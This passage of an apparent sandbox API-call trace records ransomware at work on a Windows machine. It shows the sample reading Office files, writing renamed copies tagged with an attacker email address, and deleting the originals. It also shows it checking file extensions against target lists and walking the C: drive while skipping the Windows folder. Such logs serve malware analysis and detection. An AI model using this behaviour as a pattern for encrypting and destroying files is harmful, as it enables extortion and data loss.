lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x72, lpOverlapped=0x0) returned 1 [0255.606] WriteFile (in: hFile=0x318, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x80, lpOverlapped=0x0) returned 1 [0255.607] ReadFile (in: hFile=0x3b4, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0255.607] WriteFile (in: hFile=0x318, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xee, lpOverlapped=0x0) returned 1 [0255.607] SetEndOfFile (hFile=0x318) returned 1 [0255.607] CloseHandle (hObject=0x318) returned 1 [0255.607] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0255.607] SetEndOfFile (hFile=0x3b4) returned 1 [0255.611] CloseHandle (hObject=0x3b4) returned 1 [0255.611] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0255.611] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_f_col.hxk")) returned 1 [0255.611] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 61 [0255.611] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 61 [0255.611] lstrlenW (lpString=".doc") returned 4 [0255.611] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0255.611] lstrlenW (lpString=".docx") returned 5 [0255.611] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0255.611] lstrlenW (lpString=".pdf") returned 4 [0255.611] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0255.611] lstrlenW (lpString=".xls") returned 4 [0255.611] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0255.611] lstrlenW (lpString=".xlsx") returned 5 [0255.611] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0255.611] lstrlenW (lpString=".ppt") returned 4 [0255.611] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0255.611] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 61 [0255.611] lstrlenW (lpString=".zip") returned 4 [0255.611] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0255.611] lstrlenW (lpString=".rar") returned 4 [0255.612] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0255.612] lstrlenW (lpString=".bz2") returned 4 [0255.612] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0255.612] lstrlenW (lpString=".7z") returned 3 [0255.612] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0255.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 61 [0255.612] lstrlenW (lpString=".dbf") returned 4 [0255.612] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0255.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 61 [0255.612] lstrlenW (lpString=".1cd") returned 4 [0255.612] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0255.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 61 [0255.612] lstrlenW (lpString=".jpg") returned 4 [0255.612] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0255.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 61 [0255.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 61 [0255.612] lstrlenW (lpString=".doc") returned 4 [0255.612] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0255.612] lstrlenW (lpString=".docx") returned 5 [0255.612] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0255.612] lstrlenW (lpString=".pdf") returned 4 [0255.612] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0255.612] lstrlenW (lpString=".xls") returned 4 [0255.612] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0255.612] lstrlenW (lpString=".xlsx") returned 5 [0255.612] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0255.612] lstrlenW (lpString=".ppt") returned 4 [0255.612] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0255.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 61 [0255.612] lstrlenW (lpString=".zip") returned 4 [0255.612] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0255.612] lstrlenW (lpString=".rar") returned 4 [0255.612] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0255.613] lstrlenW (lpString=".bz2") returned 4 [0255.613] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0255.613] lstrlenW (lpString=".7z") returned 3 [0255.613] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0255.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 61 [0255.613] lstrlenW (lpString=".dbf") returned 4 [0255.613] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0255.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 61 [0255.613] lstrlenW (lpString=".1cd") returned 4 [0255.613] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0255.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK") returned 61 [0255.613] lstrlenW (lpString=".jpg") returned 4 [0255.613] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0255.613] lstrcmpiW (lpString1=".HXK", lpString2=".php") returned -1 [0255.613] lstrlenW (lpString="OIS_K_COL.HXK") returned 13 [0255.613] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0255.613] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=113) returned 1 [0255.613] CloseHandle (hObject=0x3b4) returned 1 [0255.613] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_k_col.hxk")) returned 0x20 [0255.614] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_k_col.hxk.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0255.614] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0255.614] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0255.614] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0255.614] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_k_col.hxk.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0255.614] GetLastError () returned 0x0 [0255.614] ReadFile (in: hFile=0x3b4, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x71, lpOverlapped=0x0) returned 1 [0255.615] WriteFile (in: hFile=0x318, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x80, lpOverlapped=0x0) returned 1 [0255.616] ReadFile (in: hFile=0x3b4, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0255.616] WriteFile (in: hFile=0x318, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xee, lpOverlapped=0x0) returned 1 [0255.616] SetEndOfFile (hFile=0x318) returned 1 [0255.616] CloseHandle (hObject=0x318) returned 1 [0255.616] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0255.616] SetEndOfFile (hFile=0x3b4) returned 1 [0255.618] CloseHandle (hObject=0x3b4) returned 1 [0255.618] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0255.618] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_k_col.hxk")) returned 1 [0255.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 61 [0255.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 61 [0255.619] lstrlenW (lpString=".doc") returned 4 [0255.619] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0255.619] lstrlenW (lpString=".docx") returned 5 [0255.619] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0255.619] lstrlenW (lpString=".pdf") returned 4 [0255.619] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0255.619] lstrlenW (lpString=".xls") returned 4 [0255.619] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0255.619] lstrlenW (lpString=".xlsx") returned 5 [0255.619] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0255.619] lstrlenW (lpString=".ppt") returned 4 [0255.619] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0255.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 61 [0255.619] lstrlenW (lpString=".zip") returned 4 [0255.619] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0255.619] lstrlenW (lpString=".rar") returned 4 [0255.619] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0255.619] lstrlenW (lpString=".bz2") returned 4 [0255.619] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0255.619] lstrlenW (lpString=".7z") returned 3 [0255.619] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0255.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 61 [0255.619] lstrlenW (lpString=".dbf") returned 4 [0255.619] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0255.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 61 [0255.619] lstrlenW (lpString=".1cd") returned 4 [0255.619] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0255.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 61 [0255.619] lstrlenW (lpString=".jpg") returned 4 [0255.619] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0255.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 61 [0255.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 61 [0255.620] lstrlenW (lpString=".doc") returned 4 [0255.620] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0255.620] lstrlenW (lpString=".docx") returned 5 [0255.620] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0255.620] lstrlenW (lpString=".pdf") returned 4 [0255.620] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0255.620] lstrlenW (lpString=".xls") returned 4 [0255.620] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0255.620] lstrlenW (lpString=".xlsx") returned 5 [0255.620] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0255.620] lstrlenW (lpString=".ppt") returned 4 [0255.620] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0255.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 61 [0255.620] lstrlenW (lpString=".zip") returned 4 [0255.620] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0255.620] lstrlenW (lpString=".rar") returned 4 [0255.620] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0255.620] lstrlenW (lpString=".bz2") returned 4 [0255.620] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0255.620] lstrlenW (lpString=".7z") returned 3 [0255.620] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0255.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 61 [0255.620] lstrlenW (lpString=".dbf") returned 4 [0255.620] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0255.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 61 [0255.620] lstrlenW (lpString=".1cd") returned 4 [0255.620] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0255.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_K_COL.HXK") returned 61 [0255.620] lstrlenW (lpString=".jpg") returned 4 [0255.620] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0255.621] lstrcmpiW (lpString1=".DLL", lpString2=".php") returned -1 [0255.621] lstrlenW (lpString="OMSINTL.DLL") returned 11 [0255.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\omsintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0255.621] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=401792) returned 1 [0255.622] CloseHandle (hObject=0x3b4) returned 1 [0255.622] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\omsintl.dll")) returned 0x20 [0255.622] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\omsintl.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0255.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\omsintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0255.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL") returned 59 [0255.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL") returned 59 [0255.622] lstrlenW (lpString=".doc") returned 4 [0255.622] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0255.622] lstrlenW (lpString=".docx") returned 5 [0255.622] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0255.622] lstrlenW (lpString=".pdf") returned 4 [0255.622] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0255.622] lstrlenW (lpString=".xls") returned 4 [0255.622] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0255.622] lstrlenW (lpString=".xlsx") returned 5 [0255.622] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0255.622] lstrlenW (lpString=".ppt") returned 4 [0255.622] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0255.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL") returned 59 [0255.623] lstrlenW (lpString=".zip") returned 4 [0255.623] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0255.623] lstrlenW (lpString=".rar") returned 4 [0255.623] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0255.623] lstrlenW (lpString=".bz2") returned 4 [0255.623] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0255.623] lstrlenW (lpString=".7z") returned 3 [0255.623] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0255.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL") returned 59 [0255.623] lstrlenW (lpString=".dbf") returned 4 [0255.623] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0255.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL") returned 59 [0255.623] lstrlenW (lpString=".1cd") returned 4 [0255.623] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0255.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OMSINTL.DLL") returned 59 [0255.623] lstrlenW (lpString=".jpg") returned 4 [0255.623] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 Thread: id = 63 os_tid = 0x64c [0241.399] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xfffe) returned 0x46d0048 [0241.400] lstrlenW (lpString="C:") returned 2 [0241.400] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x3bafd00 | out: lpFindFileData=0x3bafd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0xba76a0 [0241.400] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0241.400] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin") returned 1 [0241.400] lstrlenW (lpString="$Recycle.Bin") returned 12 [0241.400] lstrcmpiW (lpString1="C:\\Windows", lpString2="$Recycle.Bin") returned 1 [0241.400] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xfffe) returned 0x46e0050 [0241.401] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0241.401] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x3bafa84 | out: lpFindFileData=0x3bafa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xba76e0 [0241.401] FindNextFileW (in: hFindFile=0xba76e0, lpFindFileData=0x3bafa84 | out: lpFindFileData=0x3bafa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0241.401] FindNextFileW (in: hFindFile=0xba76e0, lpFindFileData=0x3bafa84 | out: lpFindFileData=0x3bafa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xba94a0a0, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0xba94a0a0, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0241.401] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0241.401] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 1 [0241.401] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46 [0241.401] lstrcmpiW (lpString1="C:\\Windows", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned -1 [0241.401] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xfffe) returned 0x46f1060 [0241.401] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0241.401] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x3baf808 | out: lpFindFileData=0x3baf808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xba94a0a0, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0xba94a0a0, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4701068 [0241.402] FindNextFileW (in: hFindFile=0x4701068, lpFindFileData=0x3baf808 | out: lpFindFileData=0x3baf808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xba94a0a0, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0xba94a0a0, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0241.402] FindNextFileW (in: hFindFile=0x4701068, lpFindFileData=0x3baf808 | out: lpFindFileData=0x3baf808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xba94a0a0, ftCreationTime.dwHighDateTime=0x1d5351d, ftLastAccessTime.dwLowDateTime=0xba94a0a0, ftLastAccessTime.dwHighDateTime=0x1d5351d, ftLastWriteTime.dwLowDateTime=0xba94a0a0, ftLastWriteTime.dwHighDateTime=0x1d5351d, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0241.402] lstrlenW (lpString="desktop.ini") returned 11 [0241.402] lstrlenW (lpString=".1cd") returned 4 [0241.402] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0241.402] lstrlenW (lpString=".3ds") returned 4 [0241.402] lstrcmpiW (lpString1=".3ds", lpString2=".ini") returned -1 [0241.402] lstrlenW (lpString=".3fr") returned 4 [0241.402] lstrcmpiW (lpString1=".3fr", lpString2=".ini") returned -1 [0241.402] lstrlenW (lpString=".3g2") returned 4 [0241.402] lstrcmpiW (lpString1=".3g2", lpString2=".ini") returned -1 [0241.402] lstrlenW (lpString=".3gp") returned 4 [0241.402] lstrcmpiW (lpString1=".3gp", lpString2=".ini") returned -1 [0241.402] lstrlenW (lpString=".7z") returned 3 [0241.402] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0241.402] lstrlenW (lpString=".accda") returned 6 [0241.402] lstrcmpiW (lpString1=".accda", lpString2="op.ini") returned -1 [0241.402] lstrlenW (lpString=".accdb") returned 6 [0241.402] lstrcmpiW (lpString1=".accdb", lpString2="op.ini") returned -1 [0241.402] lstrlenW (lpString=".accdc") returned 6 [0241.402] lstrcmpiW (lpString1=".accdc", lpString2="op.ini") returned -1 [0241.402] lstrlenW (lpString=".accde") returned 6 [0241.402] lstrcmpiW (lpString1=".accde", lpString2="op.ini") returned -1 [0241.402] lstrlenW (lpString=".accdt") returned 6 [0241.402] lstrcmpiW (lpString1=".accdt", lpString2="op.ini") returned -1 [0241.402] lstrlenW (lpString=".accdw") returned 6 [0241.402] lstrcmpiW (lpString1=".accdw", lpString2="op.ini") returned -1 [0241.402] lstrlenW (lpString=".adb") returned 4 [0241.403] lstrcmpiW (lpString1=".adb", lpString2=".ini") returned -1 [0241.403] lstrlenW (lpString=".adp") returned 4 [0241.403] lstrcmpiW (lpString1=".adp", lpString2=".ini") returned -1 [0241.403] lstrlenW (lpString=".ai") returned 3 [0241.403] lstrcmpiW (lpString1=".ai", lpString2="ini") returned -1 [0241.403] lstrlenW (lpString=".ai3") returned 4 [0241.403] lstrcmpiW (lpString1=".ai3", lpString2=".ini") returned -1 [0241.403] lstrlenW (lpString=".ai4") returned 4 [0241.403] lstrcmpiW (lpString1=".ai4", lpString2=".ini") returned -1 [0241.403] lstrlenW (lpString=".ai5") returned 4 [0241.403] lstrcmpiW (lpString1=".ai5", lpString2=".ini") returned -1 [0241.403] lstrlenW (lpString=".ai6") returned 4 [0241.403] lstrcmpiW (lpString1=".ai6", lpString2=".ini") returned -1 [0241.403] lstrlenW (lpString=".ai7") returned 4 [0241.403] lstrcmpiW (lpString1=".ai7", lpString2=".ini") returned -1 [0241.403] lstrlenW (lpString=".ai8") returned 4 [0241.403] lstrcmpiW (lpString1=".ai8", lpString2=".ini") returned -1 [0241.403] lstrlenW (lpString=".anim") returned 5 [0241.403] lstrcmpiW (lpString1=".anim", lpString2="p.ini") returned -1 [0241.403] lstrlenW (lpString=".arw") returned 4 [0241.403] lstrcmpiW (lpString1=".arw", lpString2=".ini") returned -1 [0241.403] lstrlenW (lpString=".as") returned 3 [0241.403] lstrcmpiW (lpString1=".as", lpString2="ini") returned -1 [0241.403] lstrlenW (lpString=".asa") returned 4 [0241.403] lstrcmpiW (lpString1=".asa", lpString2=".ini") returned -1 [0241.403] lstrlenW 